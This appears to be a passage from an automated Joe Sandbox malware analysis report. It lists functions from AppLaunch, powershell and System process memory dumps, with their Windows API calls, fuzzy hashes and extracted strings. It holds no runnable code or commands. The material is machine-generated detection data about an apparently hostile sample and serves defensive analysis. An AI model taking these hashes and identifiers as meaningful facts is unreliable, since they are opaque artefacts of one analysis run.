                                                          • Instruction ID: 5a216e955f67e3a3bd41033d755698ae33aac73d4ae989ef11a9b539581e9c42
                                                          • Opcode Fuzzy Hash: 524b8d88308e3c6cc24683e9a81e6c89486956d3fb3078c91e420d603e9ba96b
                                                          • Instruction Fuzzy Hash: BF2136B19002198FCB14CFAAC884BEEBBF9FB98314F14842ED954A7351D774A945CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09825F6C Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1768 9825f6c 1769 9825f70-9826004 DuplicateHandle 1768->1769 1770 9826006-982600c 1769->1770 1771 982600d-982602a 1769->1771 1770->1771
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 09825FF7
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: ca9d60135e844c636cacce3ac9a858dc050ff0c9973b075936c16ffc813f9774
                                                          • Instruction ID: ebc8db18ff97af5f68821006be79bc2da5f54e8d01a3d2684bf24bbc182c8d1b
                                                          • Opcode Fuzzy Hash: ca9d60135e844c636cacce3ac9a858dc050ff0c9973b075936c16ffc813f9774
                                                          • Instruction Fuzzy Hash: E721E6B5D002499FDB10CF99D584ADEBBF8FB48314F14841AE914B3350D374A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0982684C Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1887 982684c-9827c92 1889 9827c94 1887->1889 1890 9827c9e-9827cce EnumThreadWindows 1887->1890 1893 9827c9c 1889->1893 1891 9827cd0-9827cd6 1890->1891 1892 9827cd7-9827d04 1890->1892 1891->1892 1893->1890
                                                          APIs
                                                          • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E28,?,?,09827C30,07B96D30,06C24D5C), ref: 09827CC1
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: EnumThreadWindows
                                                          • String ID:
                                                          • API String ID: 2941952884-0
                                                          • Opcode ID: 6f14321ce14fac3fbf0fc6dcef684584cee922f94d3f47a10c32641b55529bf0
                                                          • Instruction ID: a938045642ea01bd4c60bf5fde0273aa0ecd467392502d256cd8663c605e316a
                                                          • Opcode Fuzzy Hash: 6f14321ce14fac3fbf0fc6dcef684584cee922f94d3f47a10c32641b55529bf0
                                                          • Instruction Fuzzy Hash: BF2137719002198FDB10CFAAC844BEEFBF5EB98324F148429E564A3340D774A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09825F70 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1882 9825f70-9826004 DuplicateHandle 1883 9826006-982600c 1882->1883 1884 982600d-982602a 1882->1884 1883->1884
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 09825FF7
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 6ae552f9eb455325a412a524b172166c58f7b982c85d1a8ae8ed10e5312cf0ee
                                                          • Instruction ID: 44d4cd073b661e1af3f3e26933e5486e06f6ddf4bc8c722d8a761d4d42749d4f
                                                          • Opcode Fuzzy Hash: 6ae552f9eb455325a412a524b172166c58f7b982c85d1a8ae8ed10e5312cf0ee
                                                          • Instruction Fuzzy Hash: C021C4B5D002599FDB10CF99D984ADEBBF9FB48324F14841AE918A3350D374A954CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09827FE0 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1896 9827fe0-9828023 1897 9828025-9828028 1896->1897 1898 982802b-982802f 1896->1898 1897->1898 1899 9828031-9828034 1898->1899 1900 9828037-982806a MessageBoxW 1898->1900 1899->1900 1901 9828073-9828087 1900->1901 1902 982806c-9828072 1900->1902 1902->1901
                                                          APIs
                                                          • MessageBoxW.USER32(?,00000000,00000000,?), ref: 0982805D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: Message
                                                          • String ID:
                                                          • API String ID: 2030045667-0
                                                          • Opcode ID: 1e7a2d694450cda04a17ec2981eb30bdc6e3c5d56cb5e5c758f4adb2fc2c3f59
                                                          • Instruction ID: 5565485350bba9794521e3ebe1d79f322ca91e8c4651d78eb7fbacde865f77ba
                                                          • Opcode Fuzzy Hash: 1e7a2d694450cda04a17ec2981eb30bdc6e3c5d56cb5e5c758f4adb2fc2c3f59
                                                          • Instruction Fuzzy Hash: 1A2102B68003199FCB10CF9AD884ADEBBF5FB48310F14852EE919A7600C375A985CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 098267E0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 09826DF5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: 8a181e7c1927b9c6c4f1a1004b1448363f0eaafa52789fb592b47134e750d0aa
                                                          • Instruction ID: 037d55ba335eb66fa6e377549b06448ef6f639f55f5e8a16db0ec9dab31fafb6
                                                          • Opcode Fuzzy Hash: 8a181e7c1927b9c6c4f1a1004b1448363f0eaafa52789fb592b47134e750d0aa
                                                          • Instruction Fuzzy Hash: 0B11F2B59007598FCB20DF99D448BDEBBF8FB48224F24841AD519A7700D375A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09826D9F Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 09826DF5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: 8c26e4637d842f87a5f7e4502db062b536283543b446c17cbe22049ab184a946
                                                          • Instruction ID: 3bb0ea3f06dfd73ab4a244602506921fed967c9d50510c1ce326e6a21dbaebfc
                                                          • Opcode Fuzzy Hash: 8c26e4637d842f87a5f7e4502db062b536283543b446c17cbe22049ab184a946
                                                          • Instruction Fuzzy Hash: AB11D0B5D006498FCB20DF99D449BDEBBF4AB88324F24842AD519A7710D379A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          Function 00007FF9F0A83CAD Relevance: 5.0, Strings: 3, Instructions: 1222COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515901735.00007FF9F0A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F0A80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f0a80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @<1H$@lE$Q_L
                                                          • API String ID: 0-804404153
                                                          • Opcode ID: 0b12b55ed1496312f9272ad0065bcd6bc16ba7642b4f5fe828336245e94d1798
                                                          • Instruction ID: 27edcf7c0fb4af0bbcc53b011b10f61a60867f60f8dd0491427190e95fdce693
                                                          • Opcode Fuzzy Hash: 0b12b55ed1496312f9272ad0065bcd6bc16ba7642b4f5fe828336245e94d1798
                                                          • Instruction Fuzzy Hash: 0872252390DB860FE796D72C581A2B47FE5EF56320B4901FBD09DCB2E3D958AC168391
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B6285 Relevance: 1.5, Strings: 1, Instructions: 286COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: XOL
                                                          • API String ID: 0-2667528538
                                                          • Opcode ID: 2157784109bbb3ec7380b5a32bdb02548ed846dbece4c02761f38d373311a0f6
                                                          • Instruction ID: 33f5e3de06bde8136174674637e514fd1025c6be3dabdc94a6e1535896d775c8
                                                          • Opcode Fuzzy Hash: 2157784109bbb3ec7380b5a32bdb02548ed846dbece4c02761f38d373311a0f6
                                                          • Instruction Fuzzy Hash: 1781D07150D7864FD346972888655A07FF0EF57330B0A41EBC099CB2E3E95D6C8AC752
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B9E27 Relevance: .7, Instructions: 741COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fec9b70c77f876896c1d82ef4d1ef4d018360611fbcf1df4721d3b475b38cd84
                                                          • Instruction ID: 14ea953f9f14a701b07e1349d167b20ed951ec8943248079d900cf4671bf7d09
                                                          • Opcode Fuzzy Hash: fec9b70c77f876896c1d82ef4d1ef4d018360611fbcf1df4721d3b475b38cd84
                                                          • Instruction Fuzzy Hash: CBF1B030A0CA4D8FDB84EF5CC485AA9BBE1FF59310F14416AD45DD72A6DA75F882CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B87E8 Relevance: .5, Instructions: 504COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c3285b4d1236062eb59b38db5d958d70925f450312630fe265351ab6384e6f35
                                                          • Instruction ID: d5ca5a84db00440c9ba9fa4b52b6638e3593b0eb9a858acf310162a144a82f1b
                                                          • Opcode Fuzzy Hash: c3285b4d1236062eb59b38db5d958d70925f450312630fe265351ab6384e6f35
                                                          • Instruction Fuzzy Hash: E3F1D370A08A4D8FDF98EF1CC485AA97BE1FF68310F144169D41DD72A6DA75F882CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F0A881BD Relevance: .4, Instructions: 436COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515901735.00007FF9F0A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F0A80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f0a80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a7381c27d86fba688fa02296e44358088f328cbd69267cefa57dda1474bcd96d
                                                          • Instruction ID: f4a00c64ca2bf085fbdc31cb7817236169bb656ffff5207b85d363afe9f47330
                                                          • Opcode Fuzzy Hash: a7381c27d86fba688fa02296e44358088f328cbd69267cefa57dda1474bcd96d
                                                          • Instruction Fuzzy Hash: 70D1277280E7895FD396D728981A6B57FE4EF43320B0941FBD09DCB1E3DA58A816C391
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B1C59 Relevance: .2, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2aaa151687488b3c147001fe871f43b9344f040292836954a320a3b3c45e0d30
                                                          • Instruction ID: 4e9f531ad8362a1ad71b59de7b98bddb659d92a4e10944eee1afd31ea65b630f
                                                          • Opcode Fuzzy Hash: 2aaa151687488b3c147001fe871f43b9344f040292836954a320a3b3c45e0d30
                                                          • Instruction Fuzzy Hash: A151283190CA4A4FD304DB28D4507A5BBE5FFC5324F5482BAE05DC72F2EE68AA85C781
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B7575 Relevance: .1, Instructions: 134COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d237825c80514f133e0ab615dc4ace01c6b96b306ccb80211495249ac91134e3
                                                          • Instruction ID: ccfc6d1db23a2a922fa08ad98f6cb418f8ac8c691c5f10012c6c941c08c9ce2f
                                                          • Opcode Fuzzy Hash: d237825c80514f133e0ab615dc4ace01c6b96b306ccb80211495249ac91134e3
                                                          • Instruction Fuzzy Hash: 2431D67191CB488FDB18DF5C9C0A6A97BE0FB59321F04426FE449C32A2DB74A8558BC2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B804C Relevance: .1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5d9fefb19aeb5eb094c55b4cbe263c4874dbf0ef63ec4a1ac2531c077f6997c8
                                                          • Instruction ID: 02354346533f810f6ca626d65f51528647b2bd9b0eea179f40f3a72f361c09b5
                                                          • Opcode Fuzzy Hash: 5d9fefb19aeb5eb094c55b4cbe263c4874dbf0ef63ec4a1ac2531c077f6997c8
                                                          • Instruction Fuzzy Hash: CD21E67190CB4C4FDB59DF6C9C4A7E97BE0EB56331F04416BD048C31A2DA74A45ACB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B6578 Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e0daff3761bdc0b0ad0c191c992086ef4d3c89c7b37e8015649238e62f6c4456
                                                          • Instruction ID: c50439f80b4a298e38a1937518eb7bb657701d665c1a6dca724e367c9a2249c4
                                                          • Opcode Fuzzy Hash: e0daff3761bdc0b0ad0c191c992086ef4d3c89c7b37e8015649238e62f6c4456
                                                          • Instruction Fuzzy Hash: 6C21253161C9094FEB4CEA1CD856AB577D1FBAA320B1001AEE45DC7292ED66FC83C781
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F0A840CF Relevance: .1, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515901735.00007FF9F0A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F0A80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f0a80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a7181cc348d82d05ff9f9793c620a5458866dfe9fc193ce3f27f597d144b8d67
                                                          • Instruction ID: 43179e3d551f411151b66d6609727047d7e2f9cd474d643c8218041e856ebb9b
                                                          • Opcode Fuzzy Hash: a7181cc348d82d05ff9f9793c620a5458866dfe9fc193ce3f27f597d144b8d67
                                                          • Instruction Fuzzy Hash: 2921DD23E0DA474FE3E9DB18546A37466D6EF64310B8902BAC16EC73F2DE58FC658241
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F0A843BC Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515901735.00007FF9F0A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F0A80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f0a80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8aa38f379f597080772808474df0063a3fec606d0691afb4f2d7886dd741e5c6
                                                          • Instruction ID: c102fb3bf70700f3355af26b147df5f94ccb28076cfb77532d12ffbc1544969d
                                                          • Opcode Fuzzy Hash: 8aa38f379f597080772808474df0063a3fec606d0691afb4f2d7886dd741e5c6
                                                          • Instruction Fuzzy Hash: BA119E33D0D9454FE3E4D718945A7B86AD5EF45720B8800BAD05ECB2E2C948FC248351
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B1775 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2e2ee69d3415aa05544501e250f7913b678403cfee99a46339cdd1b702b76f30
                                                          • Instruction ID: bf10b5433a2d16edf9e8b0377a27b380b46a1eb34b57c3c796444d7ee161e175
                                                          • Opcode Fuzzy Hash: 2e2ee69d3415aa05544501e250f7913b678403cfee99a46339cdd1b702b76f30
                                                          • Instruction Fuzzy Hash: B501A77010CB0C4FD744EF0CE051AA6B3E0FB85324F50052EE58AC32A5DA32E881CB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B7CA8 Relevance: .0, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c2a9e2e34290e51b2724671ffcf24d46d0232c9ced2195fd65998a41f651ff7e
                                                          • Instruction ID: 19b81064ae046ae0f862dc8b5d6f3e63638d5192232d6209ba5136afd32270d4
                                                          • Opcode Fuzzy Hash: c2a9e2e34290e51b2724671ffcf24d46d0232c9ced2195fd65998a41f651ff7e
                                                          • Instruction Fuzzy Hash: 9AF0F63180C68D4FDB06DF3888155D57FA0EF16310B0402ABE498C72B2DB64A558CBD2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09BA108 Relevance: .0, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5363ce50b1888ee54a20fc219065d1f3fb997513670c0d70f2d6945cfafd896e
                                                          • Instruction ID: ef816330afbc05a51729e48fb1ec607fdebcebe0526f81a0f8f05fdf50868c60
                                                          • Opcode Fuzzy Hash: 5363ce50b1888ee54a20fc219065d1f3fb997513670c0d70f2d6945cfafd896e
                                                          • Instruction Fuzzy Hash: 2EF0303275C6044FDB4CAA1CF8429B5B3D1EB9A321F00016EE48BC3696E927F8868685
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B5BAD Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d842a9b538cc004dc8e24ddb2f65620f8eaf3267e0995968f707f9b85ccf366c
                                                          • Instruction ID: 75d3182837d4ba804926dc8724386c13ba13fe63f8f3b2ffa2e297c7961a4040
                                                          • Opcode Fuzzy Hash: d842a9b538cc004dc8e24ddb2f65620f8eaf3267e0995968f707f9b85ccf366c
                                                          • Instruction Fuzzy Hash: 33E08C2024C7868FD344A228A0507B97681AF86350F54497DE5EE823A3EA8976855352
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          Function 00007FF9F09C2BC9 Relevance: .2, Instructions: 173COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2d05826d53632d14c10d5fa8f58377986950276846c78f691a770574ba92db9b
                                                          • Instruction ID: c8201b8b4943e365605d34319203f1b148e2906c07e5ebd9598388a01fca088d
                                                          • Opcode Fuzzy Hash: 2d05826d53632d14c10d5fa8f58377986950276846c78f691a770574ba92db9b
                                                          • Instruction Fuzzy Hash: C5415931E0D64E0FD71EDF7888152A57BA5EB42310B15C2BFD49AC72E7ED28A8468391
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09C0088 Relevance: .4, Instructions: 402COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7bb7b4a68d546cc6d09eeffc143ce19e2e7baaf38c20538c447ec71adc56005f
                                                          • Instruction ID: 4ca48f9935409bbeac7f14b487d20c442811edbe4680101a045f9dae01949b83
                                                          • Opcode Fuzzy Hash: 7bb7b4a68d546cc6d09eeffc143ce19e2e7baaf38c20538c447ec71adc56005f
                                                          • Instruction Fuzzy Hash: 1BC13822E0CA8A4FE71AE77844552B5BB95EF56310F0881BED16EC73E3FD58B8418381
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09C20E8 Relevance: .3, Instructions: 259COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7e154f6f4a294c96985bb5b089abfb661cd32460d85f6237804dcc7a011460ab
                                                          • Instruction ID: 6fd1f70e59dbb367652b8e9c3871b4a97a98947dcb96ea040a3e57630e4cc94d
                                                          • Opcode Fuzzy Hash: 7e154f6f4a294c96985bb5b089abfb661cd32460d85f6237804dcc7a011460ab
                                                          • Instruction Fuzzy Hash: 2E812522E0CA8A4FE756FB7844512A1FB91FF56310F0882BAD1AEC76E3FD58B4458351
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09C8838 Relevance: .2, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d37bcc58059f09c69933a493c15359531216d255048b7842338c5a9710dcc256
                                                          • Instruction ID: 06fce532a66a3466e3cf269cea4885aa05906e14063ce993d73c4e8d648087a8
                                                          • Opcode Fuzzy Hash: d37bcc58059f09c69933a493c15359531216d255048b7842338c5a9710dcc256
                                                          • Instruction Fuzzy Hash: AB615070B1C9098FDB48EB6CD459AA977E1FF99311B05417AE40DC73B6EE24EC828741
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09C01A0 Relevance: .2, Instructions: 225COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 021d377b02dd687f2e679f77b3b0534ac26e399d555bc515840005da1c28f24a
                                                          • Instruction ID: 872f21b0df79388c4cbd0da5cafcddfd066255837c512af749236cc104a952d4
                                                          • Opcode Fuzzy Hash: 021d377b02dd687f2e679f77b3b0534ac26e399d555bc515840005da1c28f24a
                                                          • Instruction Fuzzy Hash: 1661F122E0CA4A4BE769FB7884556F2E781FF65310F04827AD16EC36E3FE68B4418750
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09C899E Relevance: .2, Instructions: 172COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a192b7f87c7f037cb1b6961c777dada8b8808af9bdc46acc2e868e9b5133a21
                                                          • Instruction ID: 6a93ca93598b1176d31268398b671e0293496824f103a1be16b1efe7ecbbe252
                                                          • Opcode Fuzzy Hash: 8a192b7f87c7f037cb1b6961c777dada8b8808af9bdc46acc2e868e9b5133a21
                                                          • Instruction Fuzzy Hash: D0418231B189098FDB88EF5CD459AA977E1FF99311B05407AE54EC73A2DE64EC428B40
                                                          Uniqueness

